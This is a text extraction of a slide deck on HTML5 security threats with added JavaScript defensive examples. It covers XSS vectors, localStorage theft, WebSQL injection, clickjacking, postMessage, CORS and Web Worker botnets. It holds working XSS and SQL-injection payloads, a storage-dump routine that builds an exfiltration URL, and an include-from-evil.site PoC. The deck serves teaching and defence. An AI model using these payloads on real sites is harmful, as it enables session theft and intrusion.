Slide 1

youstar@insight-labs

Slide 2

- Introduction to HTML5
- HTML5 threat model
- Vulnerabilities & defense
- Tools
- References

Slide 3

History
- HTML 1.0: June 1993, never a standard
- HTML 2.0: November 1995, RFC 1866
- HTML 3.2: 14 January 1997, W3C Recommendation
- HTML 4.0: 18 December 1997, W3C Recommendation
- HTML 4.01: 24 December 1999, W3C Recommendation
- XHTML 1.0: 26 January 2000, W3C Recommendation
- HTML5: 2008, first public working draft; December 2012, W3C Candidate Recommendation

Slide 4

Features: the three aspects of HTML5
- Content: HTML, with new tags and attributes
- Presentation of content: CSS
- Interaction with content: JavaScript, with new APIs (drag and drop, localStorage, Web Workers, etc.)

Slide 5

Features

Slide 6

No content

Slide 7

No content

Slide 8

- XSS abuse with new tags and attributes
- Hiding the URL (History API)
- Stealing from client-side storage
- Injecting into and exploiting WebSQL
- ClickJacking and CookieJacking
- Cross-origin requests and postMessage
- Client-side file includes
- Botnets and widgets

Slide 9

In:
- New tags (the tag names were lost in extraction)
- New attributes for input: autocomplete, autofocus, pattern (yes, a regex)
- New media events
- New tag for 2D rendering
- New form controls for date and time
- Geolocation
- New selectors
- Client-side storage: localStorage, sessionStorage and WebSQL
Out:
- Presentation elements (names lost in extraction)
- Presentation attributes such as align and border
- Old special-effects elements (names lost in extraction)

Slide 10

Attack:
- New XSS vectors built from the new tags and attributes
- Bypass blacklist filters that only know the old tags and event handlers
Defense:
- Add the new tags and attributes to the blacklist
- Update the regex
Caveat: a blacklist always lags the attacker; a whitelist of allowed tags and attributes, combined with context-aware output encoding, is the sturdier fix.
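
An added example in JavaScript (not from the slides): the kind of legacy blacklist slide 10 describes, three payloads built only from HTML5 attributes that it never sees, and a whitelist sanitizer that removes every element and attribute it was not told about. The blacklist patterns, the allowed-tag set, the function names and the payload strings are this example's own; the payloads use the public HTML5 vector family (autofocus/onfocus, details/ontoggle) rather than anything on the deck.

```javascript
// Added example, not the deck's code: legacy blacklist vs HTML5 payloads vs whitelist.

// A blacklist written for HTML4-era vectors: it knows <script>, <iframe>,
// javascript: URLs and the classic onload/onerror/onclick handlers.
const LEGACY_BLACKLIST = [
  /<script\b/i, /<iframe\b/i, /javascript:/i,
  /\bonload\s*=/i, /\bonerror\s*=/i, /\bonclick\s*=/i,
];
function legacyFilterBlocks(html) {
  return LEGACY_BLACKLIST.some((re) => re.test(html));
}

// Constructed payloads using only HTML5 elements/attributes. None of the blacklisted
// tokens appears, so the filter passes them; in a browser each runs alert(1) with no
// user interaction (autofocus fires focus, the open attribute fires toggle).
const HTML5_PAYLOADS = [
  '<input autofocus onfocus=alert(1)>',
  '<textarea autofocus onfocus=alert(1)></textarea>',
  '<details open ontoggle=alert(1)>x</details>',
];

// Whitelist instead: unknown tags vanish, unknown attributes vanish (that covers every
// on* handler, present or future), href must be http(s), and everything else is text.
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'em', 'strong', 'ul', 'li', 'br', 'a']);
const ALLOWED_ATTRS = { a: new Set(['href']) };
const TAG_RE = /<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi;
const ATTR_RE = /([^\s=/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

function whitelistSanitize(html) {
  let out = '';
  let last = 0;
  let m;
  TAG_RE.lastIndex = 0;
  while ((m = TAG_RE.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index)); // text between tags is escaped
    last = TAG_RE.lastIndex;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue;          // <input>, <details>, <video>, <svg>... dropped
    if (m[0][1] === '/') { out += `</${tag}>`; continue; }
    let attrs = '';
    for (const a of m[2].matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      const value = (a[2] ?? a[3] ?? a[4] ?? '').trim();
      if (!(ALLOWED_ATTRS[tag] || new Set()).has(name)) continue;
      if (name === 'href' && !/^https?:\/\//i.test(value)) continue; // no javascript:/data:
      attrs += ` ${name}="${escapeText(value)}"`;
    }
    out += `<${tag}${attrs}>`;
  }
  out += escapeText(html.slice(last));
  return out;
}
```

The tokenizer is deliberately small so the policy stays visible; for production use a parser-based sanitizer such as DOMPurify, since malformed markup and a quoted `>` inside an attribute value will confuse TAG_RE.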

Slide 11

No content

Slide 12

DOM (pre-HTML5):
- window.history.back();
- window.history.forward();
- window.history.go();
HTML5:
- history.pushState(stateObject, title, url): adds a history entry and changes the displayed URL without a page load
- history.replaceState(): same arguments as pushState, but modifies the current history entry instead of adding one
Caveat: the new URL must be same-origin with the page, otherwise the call throws a SecurityError; a payload can therefore rewrite only the path, query and fragment shown in the address bar, not the host.

Slide 13

Slide 13 text

http://127.0.0.1/html5/poc/history/xsspoc.php?xss=< script>history.pushState({},'',location.href.split("?"). shift());document.write(1) http://127.0.0.1/html5/poc/history/xsspoc.php

Slide 14

No content

Slide 15

Types
- localStorage: long-term storage, persists until the application or user clears it
- sessionStorage: per tab, for the lifetime of the session (discarded when the tab or browser is closed)
Differences
- Cookies: about 4 KB per cookie
- localStorage / sessionStorage: browser-dependent limit, usually 5 MB per origin
Support
- Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50

Slide 16

No content

Slide 17

Functions (same interface on localStorage and sessionStorage)
- setItem(key, value)
- getItem(key)
- removeItem(key)
- clear()
- key(index) together with the length property, which lets a script enumerate every entry without knowing the key names

Slide 18

Attack
- Read whatever the application has put in storage (session tokens, passwords, etc.)
- Store the XSS payload in storage so it persists and is replayed on every visit
- No path scoping: unlike cookies, storage is scoped to the origin only, so an XSS anywhere on the origin reads all of it
Defense
- Don't store sensitive data in local storage
- Don't use local storage for session identifiers
- Stick with cookies and use the HttpOnly and Secure flags
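
An added example in JavaScript (not from the slides): how an injected script enumerates a Web Storage area, the way the HTML5CSdump tool on slide 43 does, followed by a check for the kind of material slide 18 says should never be kept there. memoryStorage() is a constructed stand-in that implements the Storage interface so the code runs outside a browser; in a page you would pass window.localStorage or window.sessionStorage instead. The sensitivity heuristics, the collector URL and the sample entries are this example's own.

```javascript
// Added example, not the deck's code: enumerate and triage a Storage area.

// Constructed in-memory Storage with the same interface as window.localStorage.
function memoryStorage(entries = []) {
  const m = new Map(entries);
  return {
    get length() { return m.size; },
    key: (i) => [...m.keys()][i] ?? null,
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(String(k), String(v)); },
    removeItem: (k) => { m.delete(k); },
    clear: () => { m.clear(); },
  };
}

// Enumeration needs only length/key/getItem, which every Storage object exposes.
// The attacker never has to know the application's key names.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// Heuristics for "should not be here": key names that smell like credentials, or
// values shaped like a JWT (three base64url segments). Both are this example's own.
const SENSITIVE_KEY = /sess|token|auth|passw|secret|jwt|cookie/i;
const JWT_SHAPE = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$/;
function findSensitive(dump) {
  return Object.entries(dump)
    .filter(([k, v]) => SENSITIVE_KEY.test(k) || JWT_SHAPE.test(v))
    .map(([k]) => k)
    .sort();
}

// What an XSS payload does next: serialise the dump into one GET to a collector
// (hypothetical URL). Returned rather than sent, so it can be inspected here.
function exfilUrl(collector, dump) {
  return collector + '?d=' + encodeURIComponent(JSON.stringify(dump));
}

// Constructed sample: a storage area populated the way a careless application would.
const SAMPLE = memoryStorage([
  ['theme', 'dark'],
  ['sessionId', 'a1b2c3d4e5'],
  ['id_token', 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI0MiJ9.c2lnbmF0dXJl'],
  ['cart', '[{"sku":"123","qty":2}]'],
]);
```

Run findSensitive(dumpStorage(window.localStorage)) in the console of your own application as a quick audit: every key it returns is something an XSS on the origin walks away with, with no HttpOnly equivalent to stop it.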

Slide 19

No content

Slide 20

Database storage (WebSQL)
- Modelled on Google Gears
- Operation:
    var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSizeInBytes);
    db.transaction(function (tx) {
      tx.executeSql("YOUR SQL STATEMENT HERE", [params], successCallback, errorCallback);
    });
- Engine: SQLite (supported by WebKit browsers)
Caveat: the W3C stopped work on the WebSQL specification in 2010 and Chromium has since removed the API; the injection lessons below still apply to any client-side SQL store.

Slide 21

Attack
- Store shellcode (a persistent payload) in the database
- SQL injection through queries built by string concatenation
Defense
- Stick to parameterised executeSql calls (? placeholders with an argument array)
- Encode query results before displaying them
- Don't store sensitive data

Slide 22

Store shellcode

Slide 23

SQL injection
- Use sqlite_master to enumerate the schema:
    SELECT name FROM sqlite_master WHERE type='table'
    SELECT sql FROM sqlite_master WHERE name='table_name'
    SELECT sqlite_version()
- Select with ? placeholders:
    executeSql("SELECT name FROM stud WHERE id=" + input_id);   // wrong: injectable
    executeSql("SELECT name FROM stud WHERE id=?", [input_id]); // right: parameterised
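
An added example in JavaScript (not from the slides): what the concatenated executeSql call on slide 23 actually hands to SQLite for the three schema-enumeration payloads, next to a binder that does what the [params] argument of executeSql does for you. quoteLiteral() and bindParams() exist only to make binding visible; real code keeps calling tx.executeSql(sql, [params]) and never assembles SQL text itself. The table name, the payload strings and the function names are this example's own.

```javascript
// Added example, not the deck's code: string-built SQL vs placeholder binding.

// Vulnerable pattern from the slide: the input becomes part of the SQL text.
function buildUnsafe(inputId) {
  return 'SELECT name FROM stud WHERE id=' + inputId;
}

// SQLite literal rules: strings are single-quoted with embedded quotes doubled,
// finite numbers are emitted bare, null becomes NULL.
function quoteLiteral(v) {
  if (v === null || v === undefined) return 'NULL';
  if (typeof v === 'number' && Number.isFinite(v)) return String(v);
  return "'" + String(v).replace(/'/g, "''") + "'";
}

// Placeholder binding: every ? in the template is replaced by exactly one parameter,
// always emitted as a single literal, so a parameter can never add a clause.
// Assumes the template itself contains no literal question marks.
function bindParams(template, params) {
  let i = 0;
  const out = template.replace(/\?/g, () => {
    if (i >= params.length) throw new Error('not enough parameters');
    return quoteLiteral(params[i++]);
  });
  if (i !== params.length) throw new Error('too many parameters');
  return out;
}

// Constructed attacker inputs, in the order slide 23 uses them: list the tables,
// read one table's CREATE statement, fingerprint the engine.
const ENUM_PAYLOADS = [
  "0 UNION SELECT name FROM sqlite_master WHERE type='table'",
  "0 UNION SELECT sql FROM sqlite_master WHERE name='stud'",
  '0 UNION SELECT sqlite_version()',
];

// Side by side: the same payload through both paths.
function compare(payload) {
  return {
    unsafe: buildUnsafe(payload),
    bound: bindParams('SELECT name FROM stud WHERE id=?', [payload]),
  };
}
```

In the unsafe form the UNION is part of the statement and the query returns the schema; in the bound form the whole payload is one string literal compared against id, which matches nothing and executes nothing.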

Slide 24

Drag and drop basics
- Drag data
- The drag feedback image
- Drag effects
- Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend

Slide 25

No content

Slide 26

ClickJacking: XSS + drag and drop

Slide 27

No content

Slide 28

CookieJacking
- Combines several techniques to steal the user's local cookie files
Techniques
- Reading a local file: iframe + file://
- Detecting the state of the cookies: clickjacking
- Sending the cookies out: SMB

Slide 29

No content

Slide 30

Defense
- Load untrusted content in an iframe with the sandbox attribute
- Frame-busting script:
    if (top !== window) top.location = window.location.href;
  or, equivalently:
    if (top != self) top.location.href = self.location.href;
Caveat: script-based frame busting can be defeated (for example, the attacker's iframe can carry a sandbox attribute without allow-scripts, so the check never runs); also send X-Frame-Options and, where supported, Content-Security-Policy: frame-ancestors from the server.

Slide 31

postMessage
- Send:
    otherWindow.postMessage(message, targetOrigin);
- Receive:
    window.addEventListener("message", receiveMessage, false);
    function receiveMessage(event) {
      if (event.origin !== "http://example.org:8080") return;
      // ...
    }

Slide 32

No content

Slide 33

Defense
- Check event.origin of every received message against an exact allowlist, and pass an explicit targetOrigin (not "*") when sending anything sensitive
- Don't use innerHTML on message data:
    element.innerHTML = e.data;   // dangerous
    element.textContent = e.data; // safe
- Don't use eval() to process the message
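
An added example in JavaScript (not from the slides): a postMessage receiver that applies the three rules on slide 33, written as a pure function so the checks can be exercised without a browser. handleMessage() returns what the page should do instead of touching the DOM; the caller then assigns result.text via textContent. The trusted-origin set, the message shape ({type, text}) and the function names are this example's own assumptions.

```javascript
// Added example, not the deck's code: hardened postMessage receiver and sender.

const TRUSTED_ORIGINS = new Set(['https://app.example.org', 'https://example.org:8080']);

// The check to avoid: a substring test. event.origin is the sender's origin, which the
// attacker chooses, so "https://example.org.evil.site" passes this one.
function weakOriginCheck(origin) {
  return typeof origin === 'string' && origin.indexOf('example.org') !== -1;
}

function handleMessage(event) {
  // 1. Exact-match origin check. event.origin can be the literal string "null" for
  //    sandboxed or file:// senders; exact matching rejects that as well.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { action: 'ignore', reason: 'untrusted origin' };
  }

  // 2. Never eval the payload: treat it as data with a fixed shape and reject the rest.
  const data = event.data;
  if (typeof data !== 'object' || data === null) {
    return { action: 'ignore', reason: 'bad shape' };
  }
  if (data.type !== 'status' || typeof data.text !== 'string') {
    return { action: 'ignore', reason: 'unknown type' };
  }

  // 3. Hand back plain text for element.textContent; never assign it to innerHTML.
  return { action: 'setText', text: data.text };
}

// Sender side: an explicit targetOrigin. With "*" any window that obtained the
// reference, or navigated the target elsewhere, could read the message.
function sendStatus(targetWindow, text) {
  targetWindow.postMessage({ type: 'status', text }, 'https://app.example.org');
}

// Wiring in a page (runs only where window exists):
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  window.addEventListener('message', (event) => {
    const r = handleMessage(event);
    if (r.action === 'setText') document.getElementById('status').textContent = r.text;
  }, false);
}
```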

Slide 34

Cross-Origin Resource Sharing (CORS)
- Originally Ajax calls were subject to the Same-Origin Policy: site A could not make XMLHttpRequests to site B (more precisely, could not read the response)
- HTML5-era browsers make these cross-domain calls possible
- Site A → Site B: the response from site B must include the headers
    Access-Control-Allow-Origin: <site A>   (required)
    Access-Control-Allow-Credentials: true | false
    Access-Control-Expose-Headers: ...
    etc.

Slide 35

No content

Slide 36

No content

Slide 37

Defense
- Don't set Access-Control-Allow-Origin: * on anything that returns user-specific data (the same mistake as a wildcard Flash crossdomain.xml)
- Check the Origin request header against an allowlist before doing any work, and echo back only that origin:
    if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
- Rejecting unknown origins before processing also keeps the endpoint from being a cheap target for request floods
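
An added example in JavaScript (not from the slides): the server-side decision slide 37 sketches, as a function that maps the request's Origin header to the CORS response headers to add. Four variants are shown side by side: the wildcard, the "reflect whatever was sent" mistake, a suffix match that looks like an allowlist but is not, and the exact-match allowlist. The allowed origins and function names are this example's own.

```javascript
// Added example, not the deck's code: CORS origin handling, weak forms and the fixed one.

const ALLOWED_ORIGINS = new Set(['https://site-a.example', 'https://app.site-a.example']);

// Wildcard: every site can read the response. Acceptable only for truly public data;
// browsers refuse to honour * together with credentials, so it cannot serve logged-in data.
function corsWildcard() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Reflect: as open as *, but with credentials allowed. Any origin on the internet can
// now read the logged-in user's data with the user's cookies attached.
function corsReflect(originHeader) {
  if (!originHeader) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Suffix match: looks like an allowlist, but "https://evilsite-a.example" ends with the
// same string and is accepted.
function corsSuffix(originHeader) {
  if (!originHeader || !originHeader.endsWith('site-a.example')) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Allowlist: exact string match on scheme + host + port, echo back only that value,
// and Vary: Origin so a shared cache never serves one origin's answer to another.
// Returning {} means no CORS headers at all: the browser then blocks the read.
function corsAllowlist(originHeader, allowed = ALLOWED_ORIGINS) {
  if (!originHeader || !allowed.has(originHeader)) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Request-handler shape (framework-agnostic): decide before doing any work, so an
// unknown origin costs the server nothing beyond the header lookup.
function handleCors(req, res, processRequest) {
  const headers = corsAllowlist(req.headers.origin);
  if (Object.keys(headers).length === 0) {
    res.writeHead(403);
    res.end();
    return false;
  }
  for (const [k, v] of Object.entries(headers)) res.setHeader(k, v);
  processRequest(req, res);
  return true;
}
```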

Slide 38

Client-side file include
Code like this:
    x = new XMLHttpRequest();
    x.open("GET", location.hash.substring(1));
    x.onreadystatechange = function () {
      if (x.readyState == 4) {
        document.getElementById("main").innerHTML = x.responseText;
      }
    };
    x.send();
PoC, introducing cross-origin requests: if the attacker's server answers with Access-Control-Allow-Origin, a link such as
    http://example.com/#http://evil.site/payload.php
makes the contents of payload.php get included as HTML within the page. A new type of XSS!!
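
An added example in JavaScript (not from the slides): the include-from-hash pattern on slide 38, fixed at the two places it goes wrong. resolveInclude() decides whether a fragment may be fetched at all (same origin as the page, one fixed directory, one plain file name, no query or traversal), which is what stops the cross-origin include whatever CORS headers evil.site sends; applyInclude() then renders the response as text rather than HTML. The page origin, the fragment directory, the sample hashes and the function names are constructed for this example.

```javascript
// Added example, not the deck's code: validating a hash-driven include before fetching it.

const PAGE_ORIGIN = 'https://example.com';
const INCLUDE_DIR = '/fragments/';

// Returns the absolute URL to fetch, or null when the hash must be ignored.
function resolveInclude(hash, pageOrigin = PAGE_ORIGIN) {
  const wanted = hash.startsWith('#') ? hash.slice(1) : hash;
  if (wanted === '') return null;
  let url;
  try {
    // Resolve relative to the page, exactly as XMLHttpRequest would.
    url = new URL(wanted, pageOrigin + '/');
  } catch (e) {
    return null;
  }
  // Same origin only. This rejects http://evil.site/payload.php, //evil.site/x,
  // https://example.com.evil.site/x, and javascript:/data: URLs (origin "null").
  if (url.origin !== pageOrigin) return null;
  // Constrain to one directory; new URL() has already collapsed any ../ segments.
  if (!url.pathname.startsWith(INCLUDE_DIR)) return null;
  if (url.search !== '' || url.hash !== '') return null;
  // One plain file name, no sub-directories, no surprises in the name.
  if (!/^[a-z0-9_-]+\.html$/i.test(url.pathname.slice(INCLUDE_DIR.length))) return null;
  return url.href;
}

// Rendering rule: the fetched body goes in as text, not markup. If the fragments
// genuinely are HTML, they must come from a server-side allowlist you control, which
// resolveInclude() enforces, and even then innerHTML remains a deliberate decision.
function applyInclude(element, responseText) {
  element.textContent = responseText;
  return element;
}

// Browser wiring (runs only where window exists): fetch only what resolveInclude allows.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const target = resolveInclude(location.hash);
  if (target !== null) {
    const x = new XMLHttpRequest();
    x.open('GET', target);
    x.onreadystatechange = function () {
      if (x.readyState === 4 && x.status === 200) {
        applyInclude(document.getElementById('main'), x.responseText);
      }
    };
    x.send();
  }
}
```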

Slide 39

No content

Slide 40

Web Workers
- Run scripts in the background, independently of the page
- Very simple:
    var w = new Worker("some_script.js");
    w.onmessage = function (e) { /* do something */ };
    w.terminate();
- Can access: XHR, the navigator object, the application cache, and can spawn other workers!
- Can't access: the DOM, window and document objects

Slide 41

Attack
- Botnet: application-level DDoS attacks, email spam, distributed password cracking
- Network scanning
- Guessing the user's private IP address: identify the user's subnet, then the host address

Slide 42

COR + XSS + Workers = Shell of the Future

Slide 43

Tools
- HTML5CSdump: applies the enumeration and extraction techniques described above to dump all client-side storage belonging to a given domain name
- JS-Recon: port scans, network scans, private IP address detection

Slide 44

- Imposter: steal cookies, set cookies, steal Local Shared Objects, steal stored passwords from Firefox, etc.
- Shell of the Future: reverse web shell handler; bypasses anti-session-hijacking measures

Slide 45

- Ravan: JavaScript-based distributed computing system for hash cracking; supported hashing algorithms: MD5, SHA1, SHA256, SHA512

Slide 46

References
- HTML5 带来的新安全威胁 (New security threats brought by HTML5): xisigr
- Attacking with HTML5: lavakumark
- Abusing HTML5: Ming Chow
- HTML5 Web Security: Thomas Röthlisberger
- Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
- Cookiejacking: Rosario Valotta
- http://heideri.ch/jso/#html5
- http://www.wooyun.org/bugs/wooyun-2011-02351
- http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
- http://www.html5test.com

Slide 47

- http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
- http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
- http://code.google.com/intl/zh-CN/apis/gears/api_database.html
- http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
- http://www.w3.org/TR/access-control/
- http://m-austin.com/blog/?p=19
- https://developer.mozilla.org/en/
- http://www.w3.org/TR/cors/
- http://www.andlabs.org/tools/ravan.html
- http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

Slide 48

Contact me
- email: [email protected]
- Sites: www.codesec.info, www.insight-labs.org